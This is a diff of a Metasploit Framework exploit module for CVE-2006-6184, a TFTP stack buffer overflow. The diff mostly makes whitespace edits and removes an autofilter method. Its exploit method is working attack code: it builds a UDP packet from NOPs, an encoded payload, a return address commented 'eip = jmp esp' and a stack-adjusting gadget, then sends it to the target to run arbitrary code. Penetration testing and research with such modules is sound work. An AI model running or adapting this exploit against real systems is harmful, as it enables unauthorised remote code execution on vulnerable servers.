# This file is part of the Metasploit Framework and may be subject to
|
||||
# This file is part of the Metasploit Framework and may be subject to
|
||||
# redistribution and commercial restrictions. Please see the Metasploit
|
||||
# Framework web site for more information on licensing and terms of use.
|
||||
# http://metasploit.com/framework/
|
||||
|
@ -27,8 +27,8 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
},
|
||||
'Author' => [ 'Patrick Webster <patrick[at]aushack.com>' ],
|
||||
'Version' => '$Revision$',
|
||||
'References' =>
|
||||
[
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2006-6184'],
|
||||
['OSVDB', '11350'],
|
||||
['BID', '21320'],
|
||||
|
@ -68,22 +68,19 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
], self.class)
|
||||
end
|
||||
|
||||
def autofilter
|
||||
false
|
||||
end
|
||||
|
||||
def exploit
|
||||
connect_udp
|
||||
|
||||
|
||||
sploit = "\x00\x02" + make_nops(25 - datastore['LHOST'].length)
|
||||
sploit << payload.encoded
|
||||
sploit << [target['Ret']].pack('V') # <-- eip = jmp esp. we control it.
|
||||
sploit << "\x83\xc4\x28\xc3" # <-- esp = add esp 0x28 + retn
|
||||
sploit << "\x00" + "netascii" + "\x00"
|
||||
|
||||
|
||||
udp_sock.put(sploit)
|
||||
|
||||
|
||||
disconnect_udp
|
||||
end
|
||||
|
||||
end